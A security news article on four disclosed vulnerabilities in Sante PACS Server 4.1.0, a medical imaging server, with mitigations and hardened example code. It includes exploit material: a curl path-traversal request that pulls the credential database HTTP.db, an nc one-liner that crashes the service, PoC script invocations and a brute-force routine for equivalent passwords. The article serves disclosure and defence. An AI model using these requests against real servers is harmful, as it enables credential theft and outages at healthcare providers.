Severe Sante PACS Server Vulnerabilities Allow Arbitrary File Downloads

Security researchers have identified four vulnerabilities in Sante PACS Server 4.1.0, a medical imaging server, that expose installations to remote code execution (RCE), credential and data theft, and denial of service (DoS). One of the four is rated critical; the other three are rated high.

The most severe flaw (CVE-2025-2263) carries a CVSS score of 9.8: an unauthenticated attacker who can reach the web login endpoint can trigger a stack-based buffer overflow and compromise the host.

Technical Breakdown of Vulnerabilities

CVE-2025-2263: Stack-Based Buffer Overflow (CVSS 9.8)

During login authentication, the server decrypts the submitted credentials with OpenSSL's EVP_DecryptUpdate but passes a fixed 0x80-byte stack buffer as the output buffer. EVP_DecryptUpdate writes as many bytes as the ciphertext yields (up to the input length plus one cipher block), so the amount written is controlled by the request, not by the size of the buffer.

An attacker who supplies an encrypted username or password longer than the buffer overflows it and overwrites the saved registers and return addresses that sit above it on the stack.

Code Snippet from Vulnerable Function:

.text:00000001405CAB25  lea rdx, [rsp+138h+out] ; Fixed 0x80-byte buffer
.text:00000001405CAB2D  call cs:EVP_DecryptUpdate

The proof-of-concept script sante_pacs_stack_bof.py sends crafted ciphertext that crashes the server with attacker-controlled data in the saved return address, i.e. control of the instruction pointer (RIP):

python3 sante_pacs_stack_bof.py -u 'http://[target]:3000/'

WinDbg analysis of the crash shows registers overwritten with the payload (e.g. RDX=4141414141414129) and a call stack filled with 0x41414141 values, confirming that the attacker controls the execution flow, which is the precondition for arbitrary code execution.

CVE-2025-2264: Path Traversal (CVSS 7.5)

The server’s static resource handler does not properly sanitize user-supplied paths, so an attacker can read arbitrary files from the host via directory traversal.

The handler only checks that the requested path begins with /assets/ or ends with an allowed file extension; neither check looks for ../ segments, so a path that satisfies the check can still escape the assets directory:

Exploit Command:

curl --path-as-is -o HTTP.db 'http://[target]:3000/assets/../../.HTTP/HTTP.db'

The --path-as-is flag stops curl from collapsing the ../ segments on the client side, so the traversal reaches the server intact. The request retrieves the SQLite database HTTP.db, which contains the hashed user credentials.
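The weak check and a hardened replacement, as an added example written for this article (not Santesoft's code): flawed_is_allowed models a check that only looks at the /assets/ prefix or the file extension, as described above; resolve_static percent-decodes, normalizes and then verifies that the resolved path is still inside the assets directory. The web root /opt/pacs/www, the extension allow-list and the function names are assumptions for illustration.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

WEB_ROOT = "/opt/pacs/www"                      # assumed install path
ASSETS_ROOT = posixpath.join(WEB_ROOT, "assets")
ALLOWED_EXT = {".js", ".css", ".png", ".html"}  # assumed allow-list


def flawed_is_allowed(url_path: str) -> bool:
    """Model of the weak check: a /assets/ prefix OR an allowed extension is
    enough. Neither condition inspects '..' segments, so traversal passes."""
    return (url_path.startswith("/assets/")
            or posixpath.splitext(url_path)[1] in ALLOWED_EXT)


def resolve_static(url_path: str) -> Optional[str]:
    """Hardened: decode, collapse dot-segments, then require the resolved path
    to sit inside ASSETS_ROOT and carry an allowed extension.
    Returns the filesystem path to serve, or None (respond with 404)."""
    decoded = unquote(url_path)
    if "\x00" in decoded:
        return None
    # The server runs on Windows, where '\' is also a separator; fold it before
    # normalising so 'assets\..\..' is treated the same as 'assets/../..'.
    decoded = decoded.replace("\\", "/")
    # Normalising with a leading '/' pins '..' at the URL root rather than the
    # filesystem root, so the join below can never climb above WEB_ROOT.
    normalized = posixpath.normpath("/" + decoded.lstrip("/"))
    candidate = posixpath.normpath(
        posixpath.join(WEB_ROOT, normalized.lstrip("/")))
    if not candidate.startswith(ASSETS_ROOT + "/"):
        return None
    if posixpath.splitext(candidate)[1] not in ALLOWED_EXT:
        return None
    return candidate


if __name__ == "__main__":
    for path in ("/assets/app.js",
                 "/assets/../../.HTTP/HTTP.db",
                 "/assets/%2e%2e/%2e%2e/.HTTP/HTTP.db",
                 "/assets/..\\..\\.HTTP/HTTP.db",
                 "/index.html"):
        print(f"{path:40} flawed={flawed_is_allowed(path)!s:5} "
              f"hardened={resolve_static(path)}")
```

The traversal request from the advisory passes the flawed check because it starts with /assets/, while the hardened variant rejects it, its percent-encoded form, and a backslash variant, and still serves a normal asset path.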

CVE-2025-2265: SHA1 Hash Truncation (CVSS 7.3)

Passwords are zero-padded to 0x2000 bytes, hashed with SHA1, and the digest is base64-encoded for storage.

However, the server truncates the raw digest at the first zero byte (the behaviour of treating it as a C string) before storing it. A digest that happens to contain a 0x00 byte near its start is reduced to a prefix of one or two bytes, which destroys the collision resistance SHA1 would otherwise provide. For example, both of the following passwords produce digests that begin 8d 00, so both are stored as the single byte 0x8d and either password authenticates as the other:

Password    Truncated SHA1 prefix
K8XkE5DB    8d00
wSZuapO6    8d00

The script find_password_equivalent.py brute-forces a password with the same truncated digest in seconds:

python3 find_password_equivalent.py 8d00  # Finds match in ~5 seconds

An attacker who has obtained HTTP.db (for example via CVE-2025-2264) can therefore log in to any account whose stored hash was truncated to a short prefix, without recovering the real password.
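The search described above, as an added example written for this article and not the researchers' find_password_equivalent.py: truncated_digest models the scheme as the article describes it (zero-pad to 0x2000 bytes, SHA1, cut at the first 0x00 byte), and find_password_equivalent walks a deterministic candidate stream until a second password yields the same truncated digest. The exact padding and the point at which the NUL truncation happens are assumptions drawn from the article's description, and the pw<hex> candidate format is arbitrary.

```python
import hashlib
from typing import Collection, Optional

PAD_LEN = 0x2000  # zero-padding length the article reports (assumed exact)


def truncated_digest(password: str) -> bytes:
    """SHA1 over the zero-padded password, cut at the first NUL byte, which is
    what passing the raw digest through C string functions would do."""
    padded = password.encode("utf-8").ljust(PAD_LEN, b"\x00")
    digest = hashlib.sha1(padded).digest()
    nul = digest.find(b"\x00")
    return digest if nul < 0 else digest[:nul]


def candidate(i: int) -> str:
    """Deterministic password stream so runs are reproducible (assumed format)."""
    return f"pw{i:x}"


def find_weak_password(max_trunc_len: int = 1,
                       limit: int = 1_000_000) -> Optional[str]:
    """Find a password whose stored digest is at most max_trunc_len bytes.
    About 1 in 256 digests has a NUL in any given position, so this is quick."""
    for i in range(limit):
        pw = candidate(i)
        if len(truncated_digest(pw)) <= max_trunc_len:
            return pw
    return None


def find_password_equivalent(target: bytes,
                             exclude: Collection[str] = (),
                             limit: int = 5_000_000) -> Optional[str]:
    """Return a different password whose truncated digest equals target.
    Feasible only when target is short: matching n bytes plus the terminating
    NUL costs about 256 ** (n + 1) hashes, so a full 20-byte digest is out of
    reach while a 1-byte one takes roughly 65k attempts."""
    for i in range(limit):
        pw = candidate(i)
        if pw in exclude:
            continue
        if truncated_digest(pw) == target:
            return pw
    return None


def attempts_expected(trunc_len: int) -> int:
    """Expected brute-force work for a stored digest of trunc_len bytes."""
    return 256 ** (trunc_len + 1)


if __name__ == "__main__":
    weak = find_weak_password()
    target = truncated_digest(weak)
    print(f"weak password {weak!r} stored as {target.hex() or '(empty)'}")
    print(f"expected attempts: {attempts_expected(len(target))}")
    print(f"equivalent: {find_password_equivalent(target, exclude={weak})!r}")
```

Run the block directly to see a weak password, its one-byte stored hash, and a second password that the server would accept in its place; the 8d00 case from the advisory is exactly a one-byte stored digest.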

CVE-2025-2284: Uninitialized Pointer DoS (CVSS 7.5)

The GetWebLoginCredentials function parses multipart/form-data requests line by line, but when a form field is not followed by the line the parser expects, it dereferences a pointer that was never initialized.

A single malformed request crashes the service:

echo -ne 'GET /usrname HTTP/1.1\r\n\r\n' | nc -q 0 [target] 3000

WinDbg logs show an access violation at Sante_PACS_Server+0x170f9b, after which the process terminates.
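A defensive form parser for the failure mode described above, as an added example written for this article (not Santesoft's code or the researchers' PoC): every "next line" access is guarded, so a part whose headers are not followed by the blank line and value the parser expects is reported as malformed instead of being read past the end of the data. The boundary, field names and sample bodies are constructed for illustration.

```python
from typing import Dict, Optional


class MalformedMultipart(ValueError):
    """Raised instead of touching data that is not there."""


def parse_form_fields(body: bytes, boundary: bytes) -> Dict[str, bytes]:
    """Parse simple (non-file) multipart/form-data fields into a dict.
    Each part must be: CRLF, headers, CRLF CRLF, value, CRLF. Any part that
    stops early raises MalformedMultipart rather than being dereferenced."""
    fields: Dict[str, bytes] = {}
    parts = body.split(b"--" + boundary)
    # parts[0] is the preamble; the closing delimiter starts with '--'.
    for part in parts[1:]:
        if part.startswith(b"--"):
            break
        if not part.startswith(b"\r\n"):
            raise MalformedMultipart("delimiter not followed by CRLF")
        head, sep, data = part[2:].partition(b"\r\n\r\n")
        if not sep:
            # Header block with no blank line after it: the case where a parser
            # that blindly takes "the next line" reads uninitialized state.
            raise MalformedMultipart("part headers not terminated")
        name = None
        for header in head.split(b"\r\n"):
            key, _, value = header.partition(b":")
            if key.strip().lower() == b"content-disposition":
                for param in value.split(b";"):
                    k, _, v = param.strip().partition(b"=")
                    if k == b"name":
                        name = v.strip(b'"')
        if name is None:
            raise MalformedMultipart("part without a field name")
        if not data.endswith(b"\r\n"):
            raise MalformedMultipart("part value not terminated by CRLF")
        fields[name.decode("utf-8", "replace")] = data[:-2]
    return fields


def safe_parse(body: bytes, boundary: bytes) -> Optional[Dict[str, bytes]]:
    """Request-handler wrapper: None means 'reject with 400', never a crash."""
    try:
        return parse_form_fields(body, boundary)
    except MalformedMultipart:
        return None


# Constructed sample bodies (boundary and field names are assumptions).
BOUNDARY = b"XXX"
GOOD = (b"--XXX\r\nContent-Disposition: form-data; name=\"usrname\"\r\n\r\n"
        b"admin\r\n"
        b"--XXX\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n"
        b"secret\r\n--XXX--\r\n")
TRUNCATED = b"--XXX\r\nContent-Disposition: form-data; name=\"usrname\""
NO_VALUE_LINE = (b"--XXX\r\nContent-Disposition: form-data; "
                 b"name=\"usrname\"\r\n\r\nadmin")

if __name__ == "__main__":
    print("good     ->", safe_parse(GOOD, BOUNDARY))
    print("truncated->", safe_parse(TRUNCATED, BOUNDARY))
    print("no value ->", safe_parse(NO_VALUE_LINE, BOUNDARY))
    print("empty    ->", safe_parse(b"", BOUNDARY))
```

The two malformed bodies stop after the field header, which is the shape of input the article says trips the uninitialized pointer; here they produce None and the handler can answer with a 400 rather than dying.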

Mitigation and Response

Santesoft has fixed all four flaws in version 4.2.0. Administrators should:

  1. Upgrade to 4.2.0 or later immediately.
  2. Segment the networks hosting medical imaging systems so the PACS web interface is not reachable from untrusted networks.
  3. Monitor for anomalous HTTP requests to port 3000/TCP, in particular paths containing ../ and oversized login requests.

Disclosure Timeline

  • 2025-02-26: Vulnerabilities reported to Santesoft.
  • 2025-03-11: Vendor confirms fixes in 4.2.0.
  • 2025-03-14: Public advisories released.

These vulnerabilities underscore risks in healthcare IT systems, where outdated cryptographic practices and insufficient input validation create exploitable attack surfaces.

Organizations must prioritize patch deployment to prevent breaches of sensitive patient data.

AnuPriya
AnuPriya is a cybersecurity reporter at Cyber Press, specializing in cyber attacks, dark web monitoring, data breaches, vulnerabilities, and malware.
